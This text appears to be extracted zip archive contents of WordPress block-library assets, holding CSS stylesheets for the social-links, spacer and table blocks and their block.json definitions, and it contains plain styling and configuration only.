.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-snapchat{ stroke:#000; background-color:#fefc00; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-soundcloud{ background-color:#ff5600; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-spotify{ background-color:#1bd760; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-telegram{ background-color:#2aabee; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-threads,.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-tiktok{ background-color:#000; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-tumblr{ background-color:#011835; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-twitch{ background-color:#6440a4; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-twitter{ background-color:#1da1f2; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-vimeo{ background-color:#1eb7ea; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-vk{ background-color:#4680c2; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-wordpress{ background-color:#3499cd; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-whatsapp{ background-color:#25d366; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-x{ background-color:#000; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-yelp{ background-color:#d32422; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-youtube{ background-color:red; color:#fff; } .wp-block-social-links.is-style-logos-only .wp-social-link{ background:none; } .wp-block-social-links.is-style-logos-only .wp-social-link a{ padding:0; } .wp-block-social-links.is-style-logos-only .wp-social-link svg{ height:1.25em; width:1.25em; } .wp-block-social-links.is-style-logos-only .wp-social-link-amazon{ color:#f90; } .wp-block-social-links.is-style-logos-only .wp-social-link-bandcamp{ color:#1ea0c3; } .wp-block-social-links.is-style-logos-only .wp-social-link-behance{ color:#0757fe; } .wp-block-social-links.is-style-logos-only .wp-social-link-codepen{ color:#1e1f26; } .wp-block-social-links.is-style-logos-only .wp-social-link-deviantart{ color:#02e49b; } .wp-block-social-links.is-style-logos-only .wp-social-link-dribbble{ color:#e94c89; } .wp-block-social-links.is-style-logos-only .wp-social-link-dropbox{ color:#4280ff; } .wp-block-social-links.is-style-logos-only .wp-social-link-etsy{ color:#f45800; } .wp-block-social-links.is-style-logos-only .wp-social-link-facebook{ color:#1778f2; } .wp-block-social-links.is-style-logos-only .wp-social-link-fivehundredpx{ color:#000; } .wp-block-social-links.is-style-logos-only .wp-social-link-flickr{ color:#0461dd; } .wp-block-social-links.is-style-logos-only .wp-social-link-foursquare{ color:#e65678; } .wp-block-social-links.is-style-logos-only .wp-social-link-github{ color:#24292d; } .wp-block-social-links.is-style-logos-only .wp-social-link-goodreads{ color:#382110; } .wp-block-social-links.is-style-logos-only .wp-social-link-google{ color:#ea4434; } .wp-block-social-links.is-style-logos-only .wp-social-link-instagram{ color:#f00075; } .wp-block-social-links.is-style-logos-only .wp-social-link-lastfm{ color:#e21b24; } .wp-block-social-links.is-style-logos-only .wp-social-link-linkedin{ color:#0d66c2; } .wp-block-social-links.is-style-logos-only .wp-social-link-mastodon{ color:#3288d4; } .wp-block-social-links.is-style-logos-only .wp-social-link-medium{ color:#02ab6c; } .wp-block-social-links.is-style-logos-only .wp-social-link-meetup{ color:#f6405f; } .wp-block-social-links.is-style-logos-only .wp-social-link-patreon{ color:#ff424d; } .wp-block-social-links.is-style-logos-only .wp-social-link-pinterest{ color:#e60122; } .wp-block-social-links.is-style-logos-only .wp-social-link-pocket{ color:#ef4155; } .wp-block-social-links.is-style-logos-only .wp-social-link-reddit{ color:#ff4500; } .wp-block-social-links.is-style-logos-only .wp-social-link-skype{ color:#0478d7; } .wp-block-social-links.is-style-logos-only .wp-social-link-snapchat{ stroke:#000; color:#fff; } .wp-block-social-links.is-style-logos-only .wp-social-link-soundcloud{ color:#ff5600; } .wp-block-social-links.is-style-logos-only .wp-social-link-spotify{ color:#1bd760; } .wp-block-social-links.is-style-logos-only .wp-social-link-telegram{ color:#2aabee; } .wp-block-social-links.is-style-logos-only .wp-social-link-threads,.wp-block-social-links.is-style-logos-only .wp-social-link-tiktok{ color:#000; } .wp-block-social-links.is-style-logos-only .wp-social-link-tumblr{ color:#011835; } .wp-block-social-links.is-style-logos-only .wp-social-link-twitch{ color:#6440a4; } .wp-block-social-links.is-style-logos-only .wp-social-link-twitter{ color:#1da1f2; } .wp-block-social-links.is-style-logos-only .wp-social-link-vimeo{ color:#1eb7ea; } .wp-block-social-links.is-style-logos-only .wp-social-link-vk{ color:#4680c2; } .wp-block-social-links.is-style-logos-only .wp-social-link-whatsapp{ color:#25d366; } .wp-block-social-links.is-style-logos-only .wp-social-link-wordpress{ color:#3499cd; } .wp-block-social-links.is-style-logos-only .wp-social-link-x{ color:#000; } .wp-block-social-links.is-style-logos-only .wp-social-link-yelp{ color:#d32422; } .wp-block-social-links.is-style-logos-only .wp-social-link-youtube{ color:red; } .wp-block-social-links.is-style-pill-shape .wp-social-link{ width:auto; } .wp-block-social-links.is-style-pill-shape .wp-social-link a{ padding-left:.66667em; padding-right:.66667em; } .wp-block-social-links:not(.has-icon-color):not(.has-icon-background-color) .wp-social-link-snapchat .wp-block-social-link-label{ color:#000; }PK6[|wI+I+social-links/style.cssnu[.wp-block-social-links{ background:none; box-sizing:border-box; margin-left:0; padding-left:0; padding-right:0; text-indent:0; } .wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-link a:hover{ border-bottom:0; box-shadow:none; text-decoration:none; } .wp-block-social-links .wp-social-link a{ padding:.25em; } .wp-block-social-links .wp-social-link svg{ height:1em; width:1em; } .wp-block-social-links .wp-social-link span:not(.screen-reader-text){ font-size:.65em; margin-left:.5em; margin-right:.5em; } .wp-block-social-links.has-small-icon-size{ font-size:16px; } .wp-block-social-links,.wp-block-social-links.has-normal-icon-size{ font-size:24px; } .wp-block-social-links.has-large-icon-size{ font-size:36px; } .wp-block-social-links.has-huge-icon-size{ font-size:48px; } .wp-block-social-links.aligncenter{ display:flex; justify-content:center; } .wp-block-social-links.alignright{ justify-content:flex-end; } .wp-block-social-link{ border-radius:9999px; display:block; height:auto; transition:transform .1s ease; } @media (prefers-reduced-motion:reduce){ .wp-block-social-link{ transition-delay:0s; transition-duration:0s; } } .wp-block-social-link a{ align-items:center; display:flex; line-height:0; transition:transform .1s ease; } .wp-block-social-link:hover{ transform:scale(1.1); } .wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor,.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor svg,.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor:active,.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor:hover,.wp-block-social-links .wp-block-social-link .wp-block-social-link-anchor:visited{ fill:currentColor; color:currentColor; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link{ background-color:#f0f0f0; color:#444; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-amazon{ background-color:#f90; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-bandcamp{ background-color:#1ea0c3; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-behance{ background-color:#0757fe; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-codepen{ background-color:#1e1f26; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-deviantart{ background-color:#02e49b; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-dribbble{ background-color:#e94c89; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-dropbox{ background-color:#4280ff; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-etsy{ background-color:#f45800; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-facebook{ background-color:#1778f2; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-fivehundredpx{ background-color:#000; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-flickr{ background-color:#0461dd; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-foursquare{ background-color:#e65678; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-github{ background-color:#24292d; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-goodreads{ background-color:#eceadd; color:#382110; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-google{ background-color:#ea4434; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-instagram{ background-color:#f00075; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-lastfm{ background-color:#e21b24; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-linkedin{ background-color:#0d66c2; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-mastodon{ background-color:#3288d4; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-medium{ background-color:#02ab6c; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-meetup{ background-color:#f6405f; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-patreon{ background-color:#ff424d; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-pinterest{ background-color:#e60122; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-pocket{ background-color:#ef4155; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-reddit{ background-color:#ff4500; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-skype{ background-color:#0478d7; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-snapchat{ stroke:#000; background-color:#fefc00; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-soundcloud{ background-color:#ff5600; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-spotify{ background-color:#1bd760; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-telegram{ background-color:#2aabee; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-threads,.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-tiktok{ background-color:#000; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-tumblr{ background-color:#011835; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-twitch{ background-color:#6440a4; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-twitter{ background-color:#1da1f2; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-vimeo{ background-color:#1eb7ea; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-vk{ background-color:#4680c2; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-wordpress{ background-color:#3499cd; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-whatsapp{ background-color:#25d366; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-x{ background-color:#000; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-yelp{ background-color:#d32422; color:#fff; } .wp-block-social-links:not(.is-style-logos-only) .wp-social-link-youtube{ background-color:red; color:#fff; } .wp-block-social-links.is-style-logos-only .wp-social-link{ background:none; } .wp-block-social-links.is-style-logos-only .wp-social-link a{ padding:0; } .wp-block-social-links.is-style-logos-only .wp-social-link svg{ height:1.25em; width:1.25em; } .wp-block-social-links.is-style-logos-only .wp-social-link-amazon{ color:#f90; } .wp-block-social-links.is-style-logos-only .wp-social-link-bandcamp{ color:#1ea0c3; } .wp-block-social-links.is-style-logos-only .wp-social-link-behance{ color:#0757fe; } .wp-block-social-links.is-style-logos-only .wp-social-link-codepen{ color:#1e1f26; } .wp-block-social-links.is-style-logos-only .wp-social-link-deviantart{ color:#02e49b; } .wp-block-social-links.is-style-logos-only .wp-social-link-dribbble{ color:#e94c89; } .wp-block-social-links.is-style-logos-only .wp-social-link-dropbox{ color:#4280ff; } .wp-block-social-links.is-style-logos-only .wp-social-link-etsy{ color:#f45800; } .wp-block-social-links.is-style-logos-only .wp-social-link-facebook{ color:#1778f2; } .wp-block-social-links.is-style-logos-only .wp-social-link-fivehundredpx{ color:#000; } .wp-block-social-links.is-style-logos-only .wp-social-link-flickr{ color:#0461dd; } .wp-block-social-links.is-style-logos-only .wp-social-link-foursquare{ color:#e65678; } .wp-block-social-links.is-style-logos-only .wp-social-link-github{ color:#24292d; } .wp-block-social-links.is-style-logos-only .wp-social-link-goodreads{ color:#382110; } .wp-block-social-links.is-style-logos-only .wp-social-link-google{ color:#ea4434; } .wp-block-social-links.is-style-logos-only .wp-social-link-instagram{ color:#f00075; } .wp-block-social-links.is-style-logos-only .wp-social-link-lastfm{ color:#e21b24; } .wp-block-social-links.is-style-logos-only .wp-social-link-linkedin{ color:#0d66c2; } .wp-block-social-links.is-style-logos-only .wp-social-link-mastodon{ color:#3288d4; } .wp-block-social-links.is-style-logos-only .wp-social-link-medium{ color:#02ab6c; } .wp-block-social-links.is-style-logos-only .wp-social-link-meetup{ color:#f6405f; } .wp-block-social-links.is-style-logos-only .wp-social-link-patreon{ color:#ff424d; } .wp-block-social-links.is-style-logos-only .wp-social-link-pinterest{ color:#e60122; } .wp-block-social-links.is-style-logos-only .wp-social-link-pocket{ color:#ef4155; } .wp-block-social-links.is-style-logos-only .wp-social-link-reddit{ color:#ff4500; } .wp-block-social-links.is-style-logos-only .wp-social-link-skype{ color:#0478d7; } .wp-block-social-links.is-style-logos-only .wp-social-link-snapchat{ stroke:#000; color:#fff; } .wp-block-social-links.is-style-logos-only .wp-social-link-soundcloud{ color:#ff5600; } .wp-block-social-links.is-style-logos-only .wp-social-link-spotify{ color:#1bd760; } .wp-block-social-links.is-style-logos-only .wp-social-link-telegram{ color:#2aabee; } .wp-block-social-links.is-style-logos-only .wp-social-link-threads,.wp-block-social-links.is-style-logos-only .wp-social-link-tiktok{ color:#000; } .wp-block-social-links.is-style-logos-only .wp-social-link-tumblr{ color:#011835; } .wp-block-social-links.is-style-logos-only .wp-social-link-twitch{ color:#6440a4; } .wp-block-social-links.is-style-logos-only .wp-social-link-twitter{ color:#1da1f2; } .wp-block-social-links.is-style-logos-only .wp-social-link-vimeo{ color:#1eb7ea; } .wp-block-social-links.is-style-logos-only .wp-social-link-vk{ color:#4680c2; } .wp-block-social-links.is-style-logos-only .wp-social-link-whatsapp{ color:#25d366; } .wp-block-social-links.is-style-logos-only .wp-social-link-wordpress{ color:#3499cd; } .wp-block-social-links.is-style-logos-only .wp-social-link-x{ color:#000; } .wp-block-social-links.is-style-logos-only .wp-social-link-yelp{ color:#d32422; } .wp-block-social-links.is-style-logos-only .wp-social-link-youtube{ color:red; } .wp-block-social-links.is-style-pill-shape .wp-social-link{ width:auto; } .wp-block-social-links.is-style-pill-shape .wp-social-link a{ padding-left:.66667em; padding-right:.66667em; } .wp-block-social-links:not(.has-icon-color):not(.has-icon-background-color) .wp-social-link-snapchat .wp-block-social-link-label{ color:#000; }PK6[CO spacer/block.jsonnu[{ "apiVersion": 2, "name": "core/spacer", "category": "design", "attributes": { "height": { "type": "number", "default": 100 } }, "supports": { "anchor": true }, "editorStyle": "wp-block-spacer-editor", "style": "wp-block-spacer" } PK6[k spacer/editor.min.cssnu[.block-editor-block-list__block[data-type="core/spacer"]:before{content:"";display:block;height:100%;min-height:8px;min-width:8px;position:absolute;width:100%;z-index:1}.block-library-spacer__resize-container.has-show-handle,.wp-block-spacer.is-hovered .block-library-spacer__resize-container,.wp-block-spacer.is-selected.custom-sizes-disabled{background:rgba(0,0,0,.1)}.is-dark-theme .block-library-spacer__resize-container.has-show-handle,.is-dark-theme .wp-block-spacer.is-hovered .block-library-spacer__resize-container,.is-dark-theme .wp-block-spacer.is-selected.custom-sizes-disabled{background:hsla(0,0%,100%,.15)}.block-library-spacer__resize-container{clear:both}.block-library-spacer__resize-container:not(.is-resizing){height:100%!important;width:100%!important}.block-library-spacer__resize-container .components-resizable-box__handle:before{content:none}.block-library-spacer__resize-container.resize-horizontal{margin-bottom:0}PK6[Tspacer/style-rtl.min.cssnu[.wp-block-spacer{clear:both}PK6[hspacer/editor.cssnu[.block-editor-block-list__block[data-type="core/spacer"]:before{ content:""; display:block; height:100%; min-height:8px; min-width:8px; position:absolute; width:100%; z-index:1; } .block-library-spacer__resize-container.has-show-handle,.wp-block-spacer.is-hovered .block-library-spacer__resize-container,.wp-block-spacer.is-selected.custom-sizes-disabled{ background:rgba(0,0,0,.1); } .is-dark-theme .block-library-spacer__resize-container.has-show-handle,.is-dark-theme .wp-block-spacer.is-hovered .block-library-spacer__resize-container,.is-dark-theme .wp-block-spacer.is-selected.custom-sizes-disabled{ background:hsla(0,0%,100%,.15); } .block-library-spacer__resize-container{ clear:both; } .block-library-spacer__resize-container:not(.is-resizing){ height:100% !important; width:100% !important; } .block-library-spacer__resize-container .components-resizable-box__handle:before{ content:none; } .block-library-spacer__resize-container.resize-horizontal{ margin-bottom:0; }PK6[Tspacer/style.min.cssnu[.wp-block-spacer{clear:both}PK6[hspacer/editor-rtl.cssnu[.block-editor-block-list__block[data-type="core/spacer"]:before{ content:""; display:block; height:100%; min-height:8px; min-width:8px; position:absolute; width:100%; z-index:1; } .block-library-spacer__resize-container.has-show-handle,.wp-block-spacer.is-hovered .block-library-spacer__resize-container,.wp-block-spacer.is-selected.custom-sizes-disabled{ background:rgba(0,0,0,.1); } .is-dark-theme .block-library-spacer__resize-container.has-show-handle,.is-dark-theme .wp-block-spacer.is-hovered .block-library-spacer__resize-container,.is-dark-theme .wp-block-spacer.is-selected.custom-sizes-disabled{ background:hsla(0,0%,100%,.15); } .block-library-spacer__resize-container{ clear:both; } .block-library-spacer__resize-container:not(.is-resizing){ height:100% !important; width:100% !important; } .block-library-spacer__resize-container .components-resizable-box__handle:before{ content:none; } .block-library-spacer__resize-container.resize-horizontal{ margin-bottom:0; }PK6[k spacer/editor-rtl.min.cssnu[.block-editor-block-list__block[data-type="core/spacer"]:before{content:"";display:block;height:100%;min-height:8px;min-width:8px;position:absolute;width:100%;z-index:1}.block-library-spacer__resize-container.has-show-handle,.wp-block-spacer.is-hovered .block-library-spacer__resize-container,.wp-block-spacer.is-selected.custom-sizes-disabled{background:rgba(0,0,0,.1)}.is-dark-theme .block-library-spacer__resize-container.has-show-handle,.is-dark-theme .wp-block-spacer.is-hovered .block-library-spacer__resize-container,.is-dark-theme .wp-block-spacer.is-selected.custom-sizes-disabled{background:hsla(0,0%,100%,.15)}.block-library-spacer__resize-container{clear:both}.block-library-spacer__resize-container:not(.is-resizing){height:100%!important;width:100%!important}.block-library-spacer__resize-container .components-resizable-box__handle:before{content:none}.block-library-spacer__resize-container.resize-horizontal{margin-bottom:0}PK6[`9!!spacer/style-rtl.cssnu[.wp-block-spacer{ clear:both; }PK6[`9!!spacer/style.cssnu[.wp-block-spacer{ clear:both; }PK6[/ table/block.jsonnu[{ "apiVersion": 2, "name": "core/table", "category": "text", "attributes": { "hasFixedLayout": { "type": "boolean", "default": false }, "backgroundColor": { "type": "string" }, "caption": { "type": "string", "source": "html", "selector": "figcaption", "default": "" }, "head": { "type": "array", "default": [], "source": "query", "selector": "thead tr", "query": { "cells": { "type": "array", "default": [], "source": "query", "selector": "td,th", "query": { "content": { "type": "string", "source": "html" }, "tag": { "type": "string", "default": "td", "source": "tag" }, "scope": { "type": "string", "source": "attribute", "attribute": "scope" }, "align": { "type": "string", "source": "attribute", "attribute": "data-align" } } } } }, "body": { "type": "array", "default": [], "source": "query", "selector": "tbody tr", "query": { "cells": { "type": "array", "default": [], "source": "query", "selector": "td,th", "query": { "content": { "type": "string", "source": "html" }, "tag": { "type": "string", "default": "td", "source": "tag" }, "scope": { "type": "string", "source": "attribute", "attribute": "scope" }, "align": { "type": "string", "source": "attribute", "attribute": "data-align" } } } } }, "foot": { "type": "array", "default": [], "source": "query", "selector": "tfoot tr", "query": { "cells": { "type": "array", "default": [], "source": "query", "selector": "td,th", "query": { "content": { "type": "string", "source": "html" }, "tag": { "type": "string", "default": "td", "source": "tag" }, "scope": { "type": "string", "source": "attribute", "attribute": "scope" }, "align": { "type": "string", "source": "attribute", "attribute": "data-align" } } } } } }, "supports": { "anchor": true, "align": true, "__experimentalSelector": ".wp-block-table > table" }, "editorStyle": "wp-block-table-editor", "style": "wp-block-table" } PK6[<table/editor.min.cssnu[.wp-block-table{margin:0}.wp-block[data-align=center]>.wp-block-table,.wp-block[data-align=left]>.wp-block-table,.wp-block[data-align=right]>.wp-block-table{height:auto}.wp-block[data-align=center]>.wp-block-table table,.wp-block[data-align=left]>.wp-block-table table,.wp-block[data-align=right]>.wp-block-table table{width:auto}.wp-block[data-align=center]>.wp-block-table td,.wp-block[data-align=center]>.wp-block-table th,.wp-block[data-align=left]>.wp-block-table td,.wp-block[data-align=left]>.wp-block-table th,.wp-block[data-align=right]>.wp-block-table td,.wp-block[data-align=right]>.wp-block-table th{word-break:break-word}.wp-block[data-align=center]>.wp-block-table{text-align:initial}.wp-block[data-align=center]>.wp-block-table table{margin:0 auto}.wp-block-table td,.wp-block-table th{border:1px solid;padding:.5em}.wp-block-table td.is-selected,.wp-block-table th.is-selected{border-color:var(--wp-admin-theme-color);border-style:double;box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color)}.wp-block-table table.has-individual-borders td,.wp-block-table table.has-individual-borders th,.wp-block-table table.has-individual-borders tr,.wp-block-table table.has-individual-borders>*{border:1px solid}.blocks-table__placeholder-form.blocks-table__placeholder-form{align-items:flex-start;display:flex;flex-direction:column}.blocks-table__placeholder-form.blocks-table__placeholder-form>*{margin-bottom:8px}@media (min-width:782px){.blocks-table__placeholder-form.blocks-table__placeholder-form{align-items:flex-end;flex-direction:row}.blocks-table__placeholder-form.blocks-table__placeholder-form>*{margin-bottom:0}}.blocks-table__placeholder-input{margin-bottom:0;margin-right:8px;width:112px}.blocks-table__placeholder-input input{height:36px}PK6[c8##table/style-rtl.min.cssnu[.wp-block-table{overflow-x:auto}.wp-block-table table{border-collapse:collapse;width:100%}.wp-block-table thead{border-bottom:3px solid}.wp-block-table tfoot{border-top:3px solid}.wp-block-table td,.wp-block-table th{border:1px solid;padding:.5em}.wp-block-table .has-fixed-layout{table-layout:fixed;width:100%}.wp-block-table .has-fixed-layout td,.wp-block-table .has-fixed-layout th{word-break:break-word}.wp-block-table.aligncenter,.wp-block-table.alignleft,.wp-block-table.alignright{display:table;width:auto}.wp-block-table.aligncenter td,.wp-block-table.aligncenter th,.wp-block-table.alignleft td,.wp-block-table.alignleft th,.wp-block-table.alignright td,.wp-block-table.alignright th{word-break:break-word}.wp-block-table .has-subtle-light-gray-background-color{background-color:#f3f4f5}.wp-block-table .has-subtle-pale-green-background-color{background-color:#e9fbe5}.wp-block-table .has-subtle-pale-blue-background-color{background-color:#e7f5fe}.wp-block-table .has-subtle-pale-pink-background-color{background-color:#fcf0ef}.wp-block-table.is-style-stripes{background-color:transparent;border-bottom:1px solid #f0f0f0;border-collapse:inherit;border-spacing:0}.wp-block-table.is-style-stripes tbody tr:nth-child(odd){background-color:#f0f0f0}.wp-block-table.is-style-stripes.has-subtle-light-gray-background-color tbody tr:nth-child(odd){background-color:#f3f4f5}.wp-block-table.is-style-stripes.has-subtle-pale-green-background-color tbody tr:nth-child(odd){background-color:#e9fbe5}.wp-block-table.is-style-stripes.has-subtle-pale-blue-background-color tbody tr:nth-child(odd){background-color:#e7f5fe}.wp-block-table.is-style-stripes.has-subtle-pale-pink-background-color tbody tr:nth-child(odd){background-color:#fcf0ef}.wp-block-table.is-style-stripes td,.wp-block-table.is-style-stripes th{border-color:transparent}.wp-block-table .has-border-color td,.wp-block-table .has-border-color th,.wp-block-table .has-border-color tr,.wp-block-table .has-border-color>*{border-color:inherit}.wp-block-table table[style*=border-top-color] tr:first-child,.wp-block-table table[style*=border-top-color] tr:first-child td,.wp-block-table table[style*=border-top-color] tr:first-child th,.wp-block-table table[style*=border-top-color]>*,.wp-block-table table[style*=border-top-color]>* td,.wp-block-table table[style*=border-top-color]>* th{border-top-color:inherit}.wp-block-table table[style*=border-top-color] tr:not(:first-child){border-top-color:currentColor}.wp-block-table table[style*=border-right-color] td:last-child,.wp-block-table table[style*=border-right-color] th,.wp-block-table table[style*=border-right-color] tr,.wp-block-table table[style*=border-right-color]>*{border-left-color:inherit}.wp-block-table table[style*=border-bottom-color] tr:last-child,.wp-block-table table[style*=border-bottom-color] tr:last-child td,.wp-block-table table[style*=border-bottom-color] tr:last-child th,.wp-block-table table[style*=border-bottom-color]>*,.wp-block-table table[style*=border-bottom-color]>* td,.wp-block-table table[style*=border-bottom-color]>* th{border-bottom-color:inherit}.wp-block-table table[style*=border-bottom-color] tr:not(:last-child){border-bottom-color:currentColor}.wp-block-table table[style*=border-left-color] td:first-child,.wp-block-table table[style*=border-left-color] th,.wp-block-table table[style*=border-left-color] tr,.wp-block-table table[style*=border-left-color]>*{border-right-color:inherit}.wp-block-table table[style*=border-style] td,.wp-block-table table[style*=border-style] th,.wp-block-table table[style*=border-style] tr,.wp-block-table table[style*=border-style]>*{border-style:inherit}.wp-block-table table[style*=border-width] td,.wp-block-table table[style*=border-width] th,.wp-block-table table[style*=border-width] tr,.wp-block-table table[style*=border-width]>*{border-style:inherit;border-width:inherit}PK6[|wtable/theme.cssnu[.wp-block-table{ margin:0 0 1em; } .wp-block-table td,.wp-block-table th{ word-break:normal; } .wp-block-table figcaption{ color:#555; font-size:13px; text-align:center; } .is-dark-theme .wp-block-table figcaption{ color:hsla(0,0%,100%,.65); }PK6[rtable/theme-rtl.min.cssnu[.wp-block-table{margin:0 0 1em}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}PK6[mO+cctable/editor.cssnu[.wp-block-table{ margin:0; } .wp-block[data-align=center]>.wp-block-table,.wp-block[data-align=left]>.wp-block-table,.wp-block[data-align=right]>.wp-block-table{ height:auto; } .wp-block[data-align=center]>.wp-block-table table,.wp-block[data-align=left]>.wp-block-table table,.wp-block[data-align=right]>.wp-block-table table{ width:auto; } .wp-block[data-align=center]>.wp-block-table td,.wp-block[data-align=center]>.wp-block-table th,.wp-block[data-align=left]>.wp-block-table td,.wp-block[data-align=left]>.wp-block-table th,.wp-block[data-align=right]>.wp-block-table td,.wp-block[data-align=right]>.wp-block-table th{ word-break:break-word; } .wp-block[data-align=center]>.wp-block-table{ text-align:initial; } .wp-block[data-align=center]>.wp-block-table table{ margin:0 auto; } .wp-block-table td,.wp-block-table th{ border:1px solid; padding:.5em; } .wp-block-table td.is-selected,.wp-block-table th.is-selected{ border-color:var(--wp-admin-theme-color); border-style:double; box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color); } .wp-block-table table.has-individual-borders td,.wp-block-table table.has-individual-borders th,.wp-block-table table.has-individual-borders tr,.wp-block-table table.has-individual-borders>*{ border:1px solid; } .blocks-table__placeholder-form.blocks-table__placeholder-form{ align-items:flex-start; display:flex; flex-direction:column; } .blocks-table__placeholder-form.blocks-table__placeholder-form>*{ margin-bottom:8px; } @media (min-width:782px){ .blocks-table__placeholder-form.blocks-table__placeholder-form{ align-items:flex-end; flex-direction:row; } .blocks-table__placeholder-form.blocks-table__placeholder-form>*{ margin-bottom:0; } } .blocks-table__placeholder-input{ margin-bottom:0; margin-right:8px; width:112px; } .blocks-table__placeholder-input input{ height:36px; }PK6[rtable/theme.min.cssnu[.wp-block-table{margin:0 0 1em}.wp-block-table td,.wp-block-table th{word-break:normal}.wp-block-table figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}PK6[aE##table/style.min.cssnu[.wp-block-table{overflow-x:auto}.wp-block-table table{border-collapse:collapse;width:100%}.wp-block-table thead{border-bottom:3px solid}.wp-block-table tfoot{border-top:3px solid}.wp-block-table td,.wp-block-table th{border:1px solid;padding:.5em}.wp-block-table .has-fixed-layout{table-layout:fixed;width:100%}.wp-block-table .has-fixed-layout td,.wp-block-table .has-fixed-layout th{word-break:break-word}.wp-block-table.aligncenter,.wp-block-table.alignleft,.wp-block-table.alignright{display:table;width:auto}.wp-block-table.aligncenter td,.wp-block-table.aligncenter th,.wp-block-table.alignleft td,.wp-block-table.alignleft th,.wp-block-table.alignright td,.wp-block-table.alignright th{word-break:break-word}.wp-block-table .has-subtle-light-gray-background-color{background-color:#f3f4f5}.wp-block-table .has-subtle-pale-green-background-color{background-color:#e9fbe5}.wp-block-table .has-subtle-pale-blue-background-color{background-color:#e7f5fe}.wp-block-table .has-subtle-pale-pink-background-color{background-color:#fcf0ef}.wp-block-table.is-style-stripes{background-color:transparent;border-bottom:1px solid #f0f0f0;border-collapse:inherit;border-spacing:0}.wp-block-table.is-style-stripes tbody tr:nth-child(odd){background-color:#f0f0f0}.wp-block-table.is-style-stripes.has-subtle-light-gray-background-color tbody tr:nth-child(odd){background-color:#f3f4f5}.wp-block-table.is-style-stripes.has-subtle-pale-green-background-color tbody tr:nth-child(odd){background-color:#e9fbe5}.wp-block-table.is-style-stripes.has-subtle-pale-blue-background-color tbody tr:nth-child(odd){background-color:#e7f5fe}.wp-block-table.is-style-stripes.has-subtle-pale-pink-background-color tbody tr:nth-child(odd){background-color:#fcf0ef}.wp-block-table.is-style-stripes td,.wp-block-table.is-style-stripes th{border-color:transparent}.wp-block-table .has-border-color td,.wp-block-table .has-border-color th,.wp-block-table .has-border-color 